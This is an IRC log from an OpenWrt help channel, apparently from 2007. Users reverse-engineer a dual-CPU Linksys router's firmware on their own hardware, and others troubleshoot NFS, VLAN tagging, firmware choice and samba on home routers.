[08:45] <sn9> k
[08:46] <TrN> You know what they are?
[08:46] <sn9> just a sec
[08:46] <TrN> wait, found it.
[08:46] <sn9> k
[08:47] <TrN> strings are interesting, it is something propriatary
[08:48] <sn9> name?
[08:48] <TrN> no idea.
[08:48] <TrN> Hit any key to stop autoboot: %%2d Now bootup on 9202
[08:48] <TrN> Now bootup on 9109
[08:48] <TrN> inits both CPUs here.
[08:48] <TrN> ## Switch baudrate to %d bps and press ENTER ...
[08:48] <TrN> ## Ready for binary (kermit) download ...
[08:48] <TrN> fun.
[08:49] <hkkl> 2 cpus and switchchip.
[08:50] <TrN> This is Boot world!
[08:50] <TrN> ýYou push buttom !
[08:50] <TrN> hah
[08:50] <TrN> nice speling.
[08:51] <TrN> It has lots of commands.
[08:51] Action: Philip5-aWay is Away, Reason: ( at work ) | Since: ( Friday, November 2, 2007. 08:41:00 ) Xlack v2.1
[08:51] <sn9> well, now we know it's called "boot world"
[08:52] <hkkl> This is SPARTA!
[08:53] <PointyPumper> PASTAAAAAAAAAAAAAAAA
[08:54] <sn9> pasta on vista
[08:56] <TrN> I might be crazy.
[08:56] <TrN> but it seems like both CPUs run Linux.
[08:57] <sn9> could be
[08:57] <onovy> dualcore openwrt :]. on first cpu you can run kernel processes, and on second dropbear, coool :]
[08:57] <sn9> onovy: why not smp?
[08:57] <onovy> sn9: just kidding
[08:57] <onovy> smp is fine
[09:00] <TrN> first lines in /etc/rcS are:
[09:00] <TrN> #For two CPU communicate issue, UP eth2 at the very front. David @May 27
[09:00] <TrN> ifconfig eth2 up
[09:01] <onovy> eth2 is ethernet connected to second cpu?
[09:01] <sn9> fake ethernet connecting the two cpu's?
[09:01] <TrN> no idea.
[09:02] <TrN> br0 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BC
[09:02] <TrN> eth0 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BC
[09:02] <TrN> eth1 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BD
[09:02] <TrN> eth2 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BC
[09:02] <onovy> maybe there is one bus, two cpus and two kernel running on it
[09:02] <onovy> so no smp
[09:02] <onovy> but two systems standalone
[09:02] <TrN> not SMP for sure.
[09:03] <onovy> so that should be really ethernet for connection two internal systems
[09:03] <TrN> it must be for switch -> wlan
[09:03] <onovy> there is 3 eths
[09:04] <sn9> any idea what the wlan chipset is?
[09:05] <TrN> https://gullfoss2.fcc.gov/prod/oet/forms/blobs/retrieve.cgi?attachment_id=691357&native_or_pdf=pdf
[09:06] <TrN> http://www.starsemi.com.tw/vEng/product.php
[09:06] <sn9> i'm not inclined to look at a pdf atm
[09:06] <TrN> has a 9109 and 9202 it seems.
[09:07] <TrN> VSC7385 is switch
[09:07] <TrN> and marvell topdog draft2 wlan.
[09:07] <TrN> and yes it is running two linux kernels it seems.
[09:07] <sn9> ah
[09:07] <sn9> does the gpl source by any chance include wlan drivers?
[09:09] <TrN> sn9: No, just binaries.
[09:09] <TrN> seems the 9109 is the wlan one and is eth2 bridged.
[09:10] <TrN> the CPU i'm on is the 9202.
[09:10] <TrN> it seems the wlan cpu doesn't have any access to flash or whatever.
[09:10] <sn9> i wonder why they need a whole cpu just for wlan
[09:11] <TrN> these cpus aren't fast it seems.
[09:11] <sn9> so they saved money by adding more components? i think not
[09:12] <TrN> maybe these two soc == cheaper than fast CPU doing everything?
[09:12] <sn9> highly unlikely
[09:14] <hkkl> quite unlikely yea.
[09:14] <TrN> ah, neat.
[09:14] <TrN> NAT is done by the hardware.
[09:14] <TrN> and so is the IPS, thats why its that weird kris.o
[09:15] <TrN> and thats why NAT seems configured by /proc/strXXXX
[09:15] <hkkl> perverse things
[09:15] <hkkl> i just looked at sequans wimax SoC chip, it's also quite perverted thing
[09:16] <TrN> I bet if you weren't using the hardware NAT and stuff this box would be slow.
[09:16] <hkkl> yea
[09:16] <hkkl> asics are the way to go for network performance
[09:16] <TrN> Well, I did figure out the way to make all the lights on the front do weird things. :)
[09:18] <TrN> yep.
[09:18] <TrN> bridge name bridge id STP enabled interfaces
[09:18] <TrN> br0 8000.001310dbbdbc no eth0
[09:18] <TrN> eth2
[09:19] <TrN> eth2 is CPU2 for WLAN.
[09:19] <TrN> there are two kernels in the source tree.
[09:20] <TrN> the 9109 is just wlan stuff.
[09:20] <TrN> would be interesting to enable telnet to this one too, on another port. :)
[09:21] <TrN> I will do this once I rebuild the firmware and put ssh in both images.
[09:22] <TrN> Yes, it runs linux twice.
[09:22] <TrN> crazy
[09:23] <TrN> the config scripts in the other one bring up eth0 which is eth2 to the main CPU.
[09:23] <onovy> i was right :]
[09:24] <hkkl> does the main cpu see switchchip as eth-interfaces?
[09:24] <TrN> not really sure how to tell.
[09:24] <TrN> I think thats the only way it sees the other 'CPU'
[09:26] <TrN> /etc/issue on that CPU says:
[09:26] <TrN> Copyright (C) 2005 Starsemi ramdisk 1.0
[09:26] <hkkl> hmmh, 9109 has one 1Gbe that is integrated to chip, and 9202 has 2
[09:26] <hkkl> so it might be something like 9109-9202-switch
[09:27] <sn9> makes sense
[09:27] <TrN> the WLAN CPU seems to run hostapd/iwconfig/etc.
[09:28] <TrN> it loads the WLAN driver module, waits 10 seconds, turns its ethernet on, then attaches to the bridge.
[09:28] <sn9> lsmod
[09:28] <TrN> runs something called /bin/recvcmd &
[09:28] <TrN> thats it.
[09:29] <TrN> sn9: I'm just on the WLAN CPU by reading sources, can't access it yet. :)
[09:29] <sn9> ok, what does it insmod?
[09:29] <TrN> woah.
[09:29] <TrN> there is a sendcmd on this side. :)
[09:30] <hkkl> hahaha
[09:30] <TrN> # ./sendcmd "/bin/ls"
[09:30] <TrN> bin
[09:30] <TrN> dev
[09:30] <TrN> success. :)
[09:30] <TrN> lol
[09:31] <TrN> this rocks.
[09:32] <TrN> http://pastebin.com/m7755b887
[09:33] <hkkl> mmh, 174 euros at local store
[09:33] <hkkl> gonna order one
[09:33] <TrN> this is crazy too...
[09:33] <TrN> # ./sendcmd "ls" "ls" "ls"
[09:33] <TrN> Send File's Name success!
[09:33] <TrN> Send File's Data fail!
[09:34] <TrN> something tells me I can xfer data between them if I figure out the syntax.
[09:34] <TrN> it segfaults without parameters. :)
[09:35] <TrN> it sees 32mb of ram on that side.
[09:36] <TrN> ooh.
[09:36] <TrN> they both see the switch it seems.
[09:38] <TrN> this rocks.
[09:38] <TrN> its like two machines in one. :)
[09:38] <TrN> userland is extremely minimal there tho.
[09:39] <TrN> # ./sendcmd "busybox1" "/bin/busybox"
[09:39] <TrN> Send File's Name success!
[09:39] <TrN> Send File's Data success!
[09:39] <TrN> woo.
[09:40] <TrN> yep, it transferred.
[09:42] <TrN> haha
[09:42] <TrN> this rocks.
[09:42] <TrN> I gotta sleep, but I'll write this up tomorrow. :)
[09:43] <TrN> then I'll xfer the telnet over to that box too. :)
[09:43] <TrN> "box"
[09:43] <TrN> gnite all.
[09:43] <hkkl> nite
[09:43] <lan`> yyaawwhmmm
[09:43] <lan`> good morning..
[09:46] <c0ffee> somehow i feel that nfs is leaking memory
[09:46] <sn9> server?
[09:46] <c0ffee> yes
[09:47] <c0ffee> i watched my system, and when some client started to use nfs, suddendly 16mb of memory where allocated
[09:47] <c0ffee> (the rpc.nfsd process however only uses ~1mb)
[09:47] <sn9> any particular reason you want to run nfs as a server on your wrt?
[09:48] <c0ffee> i have a hdd attached to the box where i store backups from various clients on
[09:48] <sn9> but why nfs?
[09:48] <c0ffee> what else?
[09:49] <c0ffee> "else" has to support unix access rights and hardlinks
[09:49] <sn9> sshfs does that
[09:49] <sn9> so does afs
[09:50] <c0ffee> and they are more cpu-usage friendly than nfs?
[09:50] <sn9> sshfs uses fuse
[09:50] <c0ffee> yes, i know, but ssh alone is pretty heavy on the cpu
[09:50] <sn9> true
[09:51] <c0ffee> and afs would be better than nfs?
[09:51] <sn9> generally considered to be, but it's a whole other can of worms
[09:52] <sn9> then there is coda
[09:52] <c0ffee> uh
[09:52] <c0ffee> coda is an alias for dataloss
[09:53] <c0ffee> well, i'll disable nfs for now and see whether it still leaks memory
[09:53] <sn9> try "nbd" (network block device)
[09:54] <c0ffee> only one client can use a nbd at one time
[09:54] <c0ffee> same for iscsi
[09:54] <sn9> not true
[09:54] <c0ffee> hum
[09:54] <c0ffee> and how would concurrent writes to the same fs work?
[09:54] <sn9> one one can write, but many can read
[09:55] <sn9> s/one/only/
[09:55] <c0ffee> well, i have several clients that store backups on the disc
[09:55] <sn9> each can be a separate nbd
[10:53] Action: Nix pokes blogic
[11:11] <blogic> Nix: y0
[11:13] <blogic> Nix: got some news about the danube
[11:14] Action: Nix holds his breath
[11:14] <blogic> Nix: more problems with mtd :-)
[11:14] <Nix> :-
[11:14] <Nix> (
[11:15] <blogic> i can mount the jffs2 but it decides to reinit the fs on every bootup
[11:15] <blogic> anyway
[11:15] <blogic> was only home for an hour last night
[11:15] <blogic> when i get home tonight, i will send you the files first thing
[11:16] <nbd> if it reinits the fs on every bootup, then there must be something really wrong, since it didn't even erase the block with the eof marker
[11:18] <blogic> yes it did erase that
[11:18] <blogic> i get a deadcode thing and then the next boot no dead code, but a reinit
[11:18] <nbd> oh
[11:18] <blogic> and then all the files i created are gone
[11:19] <nbd> what does it say when it does the reinit?
[11:19] <blogic> and yes, there is summin really wrong, the shitty code
[11:19] <blogic> nothing
[11:19] <blogic> i just noticed when adding debug code in jffs
[11:32] <heruan> I'm on ar7 with acx-mac80211. I can successfully authenticate with wpa_supplicant on wlan0 and ping works.
[11:32] <heruan> The problem is when I try to bridge wlan0 and eth0: ping does not work anymore!
[11:32] <heruan> I get a series of: phy0: tx error 0x20, buf 14!
[11:33] <heruan> but if I remove eth0 from the bridge, leaving wlan0 alone on the bridge... it works again
[11:55] <N-Mi_> I'm trying to build a package using Openwrt's SDK, but it complains not to have rule "compile"
[11:56] <N-Mi_> what is the state of the SDK for Kamikaze
[11:56] <N-Mi_> tried with rev 8440 and 9465
[11:56] <N-Mi_> same error
[11:58] <N-Mi_> I've tried with an home made hello-world package (from GNU's hello software demo), and by coying a package directory from Openwrt, same error (so my package is not faulty I think)
[13:13] <t_p> where i can get images for Edimax routers? i want to test it
[13:13] <t_p> or maybe sdk?
[13:15] <Smooth-Z> hey folks!
[13:16] <Smooth-Z> i'm using Kamikaze 7.09 and followed the instructions at http://wiki.openwrt.org/UsbStorageHowto to boot from a USB device; however after a reboot, the system which comes up seems to have no sane defaults at all (i see no interfaces defined, no lan, no wan, nothing...)
[13:16] <Smooth-Z> could anyone point me to the right direction for getting this fixed?
[13:23] <skwashd-laptop> today i stupidly bought a WRT54G v7 :(
[13:23] <skwashd-laptop> hey wrt
[13:23] <denken> whoops
[13:23] <skwashd-laptop> am i better off buying a asus wl550gw or a wrt54gl ?
[13:24] <skwashd-laptop> denken: yeah ... reading a compatibility table in a store on mobile phone isn't the best
[13:27] <starch> big whoops
[13:28] <skwashd-laptop> starch: yeah ... i needed a paperweight for my desk ... so that will do the trick ... now i just need a hackable router ;)
[13:57] <stacato> skwashd-laptop: if you didn't pay too much for it, it's not the sexiest paper weight but it will do. :)
[13:58] <skwashd-laptop> stacato: better than a 15" CRT :)
[13:58] <skwashd-laptop> any suggestions for what i should buy next?
[13:58] <stacato> oh, i still got a 15" CRT
[13:58] <stacato> i would be happy if you would take it off my desk
[13:58] <stacato> along with it's 17" brother
[13:59] <stacato> :)
[13:59] <skwashd-laptop> the back of my car is loaded up ready to go to the PC recyclers tomorrow
[13:59] <stacato> for the device. it depends what you want to do really. with hdd? multiple wifi cards?
[14:00] <skwashd-laptop> just a wifi router
[14:00] <skwashd-laptop> with a bit more than just stock features
[14:01] <skwashd-laptop> i currently run ipcop + WAP54G
[14:01] <skwashd-laptop> but i want something a little less power intensive than a PIII
[14:02] <skwashd-laptop> openvpn is a must have
[14:03] <stacato> the router boards sound like a nice device
[14:05] <skwashd-laptop> stacato: one more requirement ... available over the counter on a saturday morning in australia
[14:05] <stacato> hmmmmm. check the Table of Hardware for Dingo
[14:05] <stacato> :)
[14:06] <stacato> nope, doesn't list it
[14:07] <skwashd-laptop> dingo?
[14:08] <stacato> The dingo (plural dingoes or dingos) or warrigal, Canis lupus dingo, is a type of wild dog, probably descended from the Indian Wolf (Canis Indica). [2] It is commonly described as an Australian wild dog,
[14:08] <stacato> :)
[14:09] <stacato> you said it should be available over the counter on a saturday morning in australia.
[14:09] <skwashd-laptop> stacato: i know what a dingo is
[14:09] <stacato> i couldn't think of anything else readily available
[14:09] <skwashd-laptop> lol
[14:09] <skwashd-laptop> well ... i think i will try to get my hands on a WL-550GE then
[14:09] <stacato> except maybe a trucker hat and outback roadkill
[14:10] <stacato> if you have the chance to pick hardware. look for something really solid.
[14:10] <stacato> it's not like you are in a situation of that you have something and you want to put OpenWRT on it. so spend some time looking for something good.
[14:11] <skwashd-laptop> the WL550GE looks good to me
[14:11] <ataraxus> i have some trouble with my atheros card(on openwrt kamikaze 7.06). i cant set the txpower higher than 17dbm. i tried many variations with the regdomain and the countrycode but none has worked. has somebody experienced the same trouble or solved it?
[14:11] <skwashd-laptop> i bought the WRT54G v7 cos they had sold out of the asus one
[14:11] <skwashd-laptop> and i had driven over there to get it
[14:11] <stacato> skwashd-laptop: check if these are available to you in down under. http://www.routerboard.com/
[14:13] <stacato> if you werent so far away i could send you one of spare speedport W500V's. then again. they are currently useless when it comes to openwrt. :(
[14:13] Action: Agiofws Hello
[14:13] <skwashd-laptop> swap you a WRT54G v7 ;)
[14:14] <stacato> heh
[14:14] <ataraxus> hey
[14:14] <stacato> even more useless
[14:14] <skwashd-laptop> i think if i went for something like that i would just grab something from yawarra.com.au and throw pfsense on it
[14:20] <Ydef> the wrt600n looks to revo the industry
[14:20] <troffasky> revo?
[14:23] <skwashd-laptop> stacato: thanks for your help
[14:25] <Rince> question: my pppd seems to die when my connection gets terminated. Is there a way to say that the pppd should be restarted if it gets terminated?
[14:28] <Soopaman_Luva> hmm... somewhat stupid question
[14:29] <Soopaman_Luva> but could one use a regular wireless n mini-pci card in a router?
[14:29] <stacato> skwashd-laptop: i didn't do much. :)
[14:29] <Rince> Soopaman_Luva: that depends on wether your router has a mini-pci-port and the Operating System does supportit
[14:30] <Soopaman_Luva> rince, have the mini pci port
[14:30] <stacato> Ydef: how do you mean ?
[14:31] <Soopaman_Luva> and working on getting into the box to upgrade it's pre-built linux tools
[14:33] <lBoxy> any solution for us unlucky who running Vista and samba 2.x?
[14:44] <Soopaman_Luva> sn9, you around, have some pics of my router's mainboard
[14:46] <sn9> which router was that, again?
[14:52] <Soopaman_Luva> sn9, ovislink wmu9000vpn
[14:52] <Soopaman_Luva> went and bought a usb to rs232 adapter aswell
[14:52] <sn9> oh, right
[14:53] <Soopaman_Luva> so i just need to figure out if i should solder a header directly on the board
[14:53] <sn9> a header is already indirect
[14:54] <Soopaman_Luva> yeah but i bought an actual usb to serial adapter, instead of doing the cell phone adapter mod
[14:55] <Soopaman_Luva> so i have a tradtional serial interface on the other side of the usb cable
[14:56] <SlimG2> I've got a WRT54GL 1.1 (original linksys firmware), what OpenWRT firmware should I choose? Do I still have to choose the 2.4 kernel version to get the wireless support?
[14:56] <loswillios> yes
[14:57] <lBoxy> sn9> is here any samba 3.x ipk for wl-500?
[14:58] <SlimG2> what specific firmware should I choose here?: http://downloads.openwrt.org/kamikaze/7.09/brcm-2.4/
[14:59] <sn9> lBoxy: whatever samba version is there is there
[14:59] <SlimG2> There doesn't seem to be a specific firmware for WRT54GL
[14:59] <nanonyme> wrt54gl is mostly the same as wrt54g
[14:59] <sn9> SlimG2: v4
[14:59] <nanonyme> well, yes
[15:00] <sn9> Soopaman_Luva: usb != traditional
[15:00] <SlimG2> sn9: openwrt-wrt54gs_v4-2.4-squashfs.bin ?
[15:02] <sn9> SlimG2: without the S
[15:04] <SlimG2> sn9: there isn't any other firmwares in that folder that matches *_v4-* as far as I can see
[15:04] <nanonyme> http://downloads.openwrt.org/kamikaze/7.09/brcm-2.4/openwrt-wrt54g-2.4-squashfs.bin looks like the thing
[15:05] <SlimG2> nanonyme: Are you refering to my request?
[15:06] <nanonyme> indeed
[15:07] <SlimG2> thanks guys! ( loswillios, sn9 and nanonyme)
[15:10] <loswillios> lBoxy: there is a samba3 ipk, search the forum
[15:19] <lBoxy> loswillios> wow thank you
[15:20] <lBoxy> or do you know any solution how to connect Vista to samba 2.x
[15:21] <loswillios> no
[15:21] <lBoxy> i found that when I disable security then Vista can sees samba
[15:21] <lBoxy> but looks like there is problem with access on it
[15:36] <FinboySlick> Is it possible to handle vlan within vlan in the switch of a wrtsl54gs? I need to run a trunk port through it.
[15:37] <Soopaman_Luva> (10:00:18 AM) sn9: Soopaman_Luva: usb != traditional
[15:37] <Soopaman_Luva> pardon?
[15:38] <sn9> you don't have a full uart with usb -- avoid it if at all possible
[15:38] <FinboySlick> Soopaman_Luva: It's a liberal progressive USB ;)
[16:13] <holo> i am running kamikaze in wrt54gl, when i make iwlist wl0 scan, the wireless card crashes
[16:14] <holo> is there a reason for this?
[16:14] <sn9> wireless-tools and wl are not fully compatible
[16:26] <mac|gyver> on kamikaze 7.09 I cannot install iptables-mod-nat because it's missing kmod-ipt-nat
[16:26] <mac|gyver> are there any plans to make kmod-ipt-nat available?
[16:29] <MadTitan> I've flashed a wrt54gsv1.1 with firmware built from trunk, now I can't reflash. How do I check boot_wait without nvram pkg.
[16:59] <N-Mi> wow, it took four hours an half to cast a mail via the openwrt-users list. Seems that the server is a little overloaded
[17:00] <Ge0rG> maybe you were greylisted?
[17:00] <N-Mi> Ge0rG: How can I see if I am ?
[17:00] <Ge0rG> N-Mi: look into the header of the mail on the ML
[17:05] <N-Mi> Ge0rG: I've looked at the mail's headers, but I don't see anything.
[17:09] <DomQ> I see that the wiki is on the move these danys
[17:09] <DomQ> s/danys/days
[17:09] <DomQ> How do I choose the right firmware version for my WRT54GL now?
[17:10] <troffasky> check the version of your hardware first
[17:11] <DomQ> I don't have it at hand right now :-(
[17:11] <DomQ> Actually I'm trying to assemble instructions for someone else I'm giving away the router to
[17:12] <DomQ> I see that there are only two hardware revs of WRT54GL available at large,
[17:12] <nanonyme> read release.txt?
[17:12] <DomQ> http://en.wikipedia.org/wiki/Wrt54g#WRT54GL
[17:13] <DomQ> nanonyme: oh. :-)
[17:13] <nanonyme> there is only one type of wrt54gl, really
[17:13] <DomQ> I used to rely on the Wiki (I have another WRT54GL at home), that's why.
[17:13] <nanonyme> and release.txt explains which kamikaze firmware you need
[17:13] <nanonyme> don't rely on the wiki, it might be incorrect
[17:16] <DomQ> nanonyme: uh, no mention of WRT54G* in http://downloads.openwrt.org/kamikaze/7.09/release.txt
[17:16] <nanonyme> DomQ, all broadcom are the same
[17:16] <nanonyme> read under topic Platforms
[17:17] <MadTitan> If I'm running kamikaze, how do i check/set boot_wait?
[17:17] <DomQ> I forgot about WRT54G* being Broadcoms
[17:18] <DomQ> Thanks anyway, so I avail myself of brcm-2.4 and... I don't get a 2.6 kernel right?
[17:18] <nanonyme> unless you don't need wifi, not yet
[17:19] <nanonyme> as the release.txt says
[17:19] <nanonyme> everything else works fine
[17:19] <DomQ> OK, thanks for the RTFM session then :-)
[17:20] <nanonyme> well, especially if you're making instructions for someone else, it's a good idea to know about the release.txt
[17:20] <nanonyme> it contains the most up-to-date info about the firmware packages
[17:40] <DomQ> nanonyme: for the record (or lack thereof), the appropriate Wiki page is http://wiki.openwrt.org/OpenWrtDocs/Installing
[17:40] <nanonyme> DomQ, that's obsolete
[17:40] <DomQ> Except that it it is no longer linked with the homepage (perhaps because it deals with Whiterussian?)
[17:40] <DomQ> heh
[17:40] <nanonyme> yups
[17:41] <nanonyme> chapter 3 should still be valid though
[17:41] <DomQ> 2.1 also
[17:42] <nanonyme> not really
[17:42] <nanonyme> 2.1 is one of the parts that is lagging behind
[17:43] <DomQ> well, the difference between trx and bin is helpful to me, as is the table matching WRT54G flavors to binary names
[17:43] <MadTitan> ok, I cat'd /dev/mtd0 > /tmp/mtd0 and grep'd for boot_wait and it is now off.
[17:43] <nanonyme> DomQ, there are plenty more firmwares than those now
[17:44] <DomQ> Hmm. I'd like to offer to contribute to the Wiki to restore "Installing", but it's obvious I know too little...
[17:44] <DomQ> Well thanks for the info anyway, my own questions are answered now.
[18:47] <forum2006> .
[18:48] <forum2006> ..
[18:50] <forum2006> cats are so nice :)
[18:51] <Supaplex> lolcats are to
[18:58] <jeff1> Can anyone assist me in understanding how to implament vlan ID 50 to my wrt54gl? I need to access a motorola canopy network tagged with said id
[19:00] <jeff1> Where is HAL when you need him
[19:01] <jeff1> I have looked thu the web site and I can't make sence of the linux syntax. I am used to DOS syntax
[19:07] <FinboySlick> jeff1: Keep me up to date on your query, I have a similar problem (Canopy here too)
[19:09] <TrN> http://www.hydrogenaudio.org/forums/index.php?showtopic=58720 <- semi-complete guide to get started hacking on the WRVS4400N Dual CPU router. :b
[19:13] <FinboySlick> jeff1: I seem to remember that there is a /sys entry to have the switch strip vlans.
[19:15] <jeff1> I have the commands for doing this
[19:15] <jeff1> my problem is I don't understand linux syntax
[19:15] <josephus> what is linux syntax?
[19:16] <jeff1> Usage: vconfig COMMAND [OPTIONS] ...
[19:16] <jeff1> vconfig lets you create and remove virtual ethernet devices.
[19:16] <jeff1> Options:
[19:16] <jeff1> add [interface-name] [vlan_id]
[19:16] <jeff1> rem [vlan-name]
[19:16] <jeff1> set_flag [interface-name] [flag-num] [0 | 1]
[19:17] <josephus> lol
[19:17] <jeff1> the command is vconfig
[19:18] <TrN> I guess nobody is interested in hacking the WRVS4400N, eh?
[19:18] <jeff1> usage: vconfig COMMAND [options]
[19:18] <jeff1> options: add [interface-name] [vlan_id]
[19:18] <jeff1> rem [vlan-name]
[19:19] <jeff1> set_flag [interface-name] [flag-num] [0 | 1]
[19:20] <jeff1> set_egress_map [vlan-name] [skb_priority] [vlan_qos]
[19:21] <jeff1> set_ingress_map [vlan-name] [skb_priority] [vlan_qos]
[19:21] <jeff1> set_name_type [name-type]
[19:21] <jeff1> any clue?
[19:21] <josephus> no
[19:58] <forum2006> .
[20:10] <TrN> I see some people are reading my post.
[20:11] <TrN> OpenWRT would really be neat on this monster.
[20:11] <TrN> But I'll settle for expanding the stock Linksys firmware for now.
[20:45] <forum2006> .
[20:52] <denken> can you, or can you not reflash a wrt54g3g back to stock linksys firmware after flashing it with openwrt? linksys only supplies a .bin...
[20:55] <_Fallen> bin is a trx with linksys specific headers
[20:55] <_Fallen> I believe it was remove the first 32 bytes
[20:55] <_Fallen> then you have a trx you can write with mtd
[20:56] <_Fallen> but dont take my word for it
[20:56] <denken> ah thats what i was wondering
[20:56] <denken> so it wont "just work"
[20:56] <_Fallen> I'm not sure if webif detects this, I'm totally off track with openwrt
[20:56] <denken> ive got a number of wrt54g's but this 54g3g is my one-and-only internet connection
[20:56] <_Fallen> I think I'm still running rc5 on most of my wrts
[20:56] <denken> just wanna leave myself a way out
[20:56] <denken> hehe i was for a long time too
[20:57] <denken> just finally upgraded most of hte units here to 7.07
[21:13] <h3sp4wn> denken: why when 7.09 is out ? (and only a bugfix release)
[21:18] <FinboySlick> Anybody here familiar with the inner workings of vtun? I want to know if it will pack smaller ethernet frames into a single udp packet.
[21:23] <thermoman> did you hear buffalo is shipping dd-wrt preinstalled on a new router they sell
[21:25] <Warod> fail
[21:26] <Wonka> TheCompWiz: i saw that... assholes...
[21:30] <h3sp4wn> thermoman: Did #openwrt care ?
[21:42] <forum2006> .
[21:46] <mac|gyver> what's the best way to run a pppoe client? rp-pppoe-client or the ppp module?
[21:51] <forum2006> .
[21:52] <thermoman> h3sp4wn: i dunno. thought it's nice to hear companies bundle OSS-firmwares with their hardware
[21:54] <h3sp4wn> thermoman: If it was openwrt it may be more of interest
[21:55] <thermoman> sure
[21:55] <h3sp4wn> You can get compex stuff specifically designed for openwrt
[21:56] <h3sp4wn> perhaps thats not totally accurate as you can get the same stuff with a crippled bootloader also
[21:56] <J4k3> WOO
[21:56] Last message repeated 1 time(s).
[21:56] <J4k3> xv6700 in my hand
[21:56] <J4k3> well, on the desk right now, soon as I'm done typing its back in my hand
[21:56] <J4k3> does openwrt run on this yet?!?! :D
[22:01] <forum2006> LOL
[22:10] <mac|gyver> is there a default way to get the ip address of a certain interface?
[22:11] <denken> h3sp4wn: when i say "just upgraded" i mean in the last couple months
[22:14] <StormSSK> *Winces* Yes ?
[22:15] <StormSSK> Anyone around who can provide me a hand with a troublesome WGT634U ?
[22:16] <agaffney> StormSSK: troublesome how?
[22:16] <StormSSK> Well, it wont take up an IP on the WAN interface .. mostly due to the fact of my own incompetence me thinks
[22:18] <h3sp4wn> StormSSK: static or dhcp ?
[22:18] <StormSSK> DHCP
[22:19] <h3sp4wn> wan being wireless or just normal wan ? (using trunk ?)
[22:19] <StormSSK> Normal WAN
[22:19] <StormSSK> ISP provides Cable Modem, suppling ISP IP to WAN Interface
[22:20] <StormSSK> Basicly from what i could see .. the configuration that comes with the Firmware standard distro should work out of the box ... me thinks
[22:20] <h3sp4wn> Yep unless there is some stuff with it needing the mac address registered (or cloned)
[22:21] <StormSSK> no nothing like that
[22:21] <TheCompWiz> StormSSK: ... is it a cable modem?
[22:22] <h3sp4wn> trunk r9456 definately works for me (and I have to login to a private network to register the mac)
[22:22] <StormSSK> yes
[22:22] <StormSSK> cable modem
[22:23] <StormSSK> WTF
[22:23] <TheCompWiz> Many cable modems have a built-in arp cache... which dosn't clear immediately.
[22:23] <StormSSK> It got an IP just for restarting the modem :$
[22:23] <TheCompWiz> contact your ISP & ask them politely to reset the arp cache.
[22:23] <TheCompWiz> cloning the mac would have solved the problem too.
[22:24] <StormSSK> :)
[22:24] <StormSSK> This be dumb :)
[22:24] <StormSSK> but seems to have worked
[22:24] <StormSSK> now how to get the forsaken XWGT on it :P
[22:24] <TheCompWiz> y'mean... xwrt?
[22:25] <StormSSK> Yeah :$
[22:25] <TheCompWiz> read the how-to. (I usually add an ipkg repository & use ipkg to install)
[22:25] <StormSSK> yeah
[22:25] <StormSSK> i had the page open ....
[22:25] <StormSSK> just cant seem to find where i got it to
[22:30] <StormSSK> just an added thing :) is it possible to update from 7.07 to 7.09 through ipkg update ?
[22:33] <lBoxy> forum2006 are you up?
[22:34] <lBoxy> or anybody similar able and willing to help me with solution for trouble samba and Vista?
[22:34] <forum2006> not really. i have to play with my new cat :)
[22:35] <lBoxy> which one?
[22:36] <lBoxy> 2 legs, 4 legs, or many legs? :-) (many legs = chips in eletronics)
[22:37] <forum2006> 4 legs
[22:37] <forum2006> the animal :)
[22:37] <Wonka> cats are cute...
[22:38] <lBoxy> yes, if they are alive, 10 minutes ago i saw one died on trails :-(
[22:38] <forum2006> yeah indeed. the cat is just two month old and like to play the whole day
[22:38] <lBoxy> well, the best solution is to have all 3 kinds of cats
[22:39] <lBoxy> and especialy many species of 2 legs cats :-)
[22:39] <lBoxy> forum2006> do you think, when your cat will come to bed, is any chance to find solution for me?
[22:40] <Wonka> two-square-meter cats are non-cute, right
[22:40] <forum2006> no. because i don't use samba
[22:41] <lBoxy> Wonka> it is equal to 2 "human" 2legs cats
[22:42] <lBoxy> it is acceptable :-)
[22:50] <wescotte> When running a router w/ openWRT do you need to perform a shutdown or is it safe to just pull the plug?
[22:51] <blogic> ts safe to pull the plug
[22:51] <wescotte> blogic: thanks
[22:51] <blogic> :P
[22:51] <wescotte> I assumed it was but I just wanted to make sure
[23:00] <lBoxy> anybody else who is without cats and can help me with samba? :-)
[23:04] <baka> whats the magic words to look for if i want to do vlan tagging? searching for the obvious one (vlan) only gives me how to configure the builtin switch thing ... which i dont think is related to outside-vlan-tagging.
[23:04] <blogic> baka: vconfig ?
[23:05] <baka> oooh. i was looking for a package, didnt even check if it is already installed. *blushes*
[23:05] <blogic> vconfig add eth0 123
[23:05] <MrParanoia> i think i'll buy a spare router in case i fry my router doing this openwrt (especially since i haven't found a way to do this boot_wait stuff)
[23:05] <blogic> ifconfig eth0.123 192.168.123.1 up
[23:06] <blogic> 192.168.123.1 will then be tagged with vid=123
[23:06] <baka> bah, i might hammer this into the wiki later, i cant be the only one trying to make german vdsl work. X)
[23:07] <blogic> baka: who is our provider ?
[23:07] <baka> there is only one for that: t-home / t-entertain / t-online ... or whatever this weeks "brand" for it is.
[23:08] <blogic> oki
[23:08] <baka> they have the pppoe on vlan7, or so the intarweb says. :)
[23:09] <forum2006> i'm happy not to deal with t-home and pppoe anymore :)
[23:09] <baka> tell me any other way i can get 10M up and 50M down at home at a not entirely unreasonable price. X)
[23:10] <forum2006> probably difficult. but i'm happy with cable internet 6000/460 :)
[23:11] <baka> this is an upgrade from adsl with 3000:640 for me ...
[23:15] <blogic> how much do you pay ?
[23:16] Action: blogic currently has t-dsl 16k
[23:17] <baka> only available woth phone and TV crap i dont care about. about 75eur/month. which i dont mind because it will replace a dedicated server.
[23:17] <baka> 10Mbps up == TBs per month
[23:17] <blogic> hehe
[23:24] <forum2006> i pay 20euros/month for cable internet
[23:25] <baka> 29.90 here ...
[23:25] <baka> i am not too happy with the quality of kabeldeutschland IP though.
[23:26] <baka> problems that are not unexpected on a shared medium, but still.
[23:27] <forum2006> cable internet isn't a shared medium...
[23:28] <baka> i guess we are using different ideas about "cable" and "shared medium" there. :)
[23:39] <baka> sigh. "vconfig add vlan1 7" doesnt give me a vlan1.7 ... it gives me a vlan7 which does not seem to do what i want it to. :(
[23:48] <Rince> question: I have my kamikaze on the routerboard-system; but wireless doesn't do encryption... any hints what could be wrong? my wireless-config is in http://paste.debian.net/41353
[23:57] <yodaz> do you know where I can find a http://openwrt.org/downloads/snapshots/fonera-2.6/packages/Packages mirror please ?
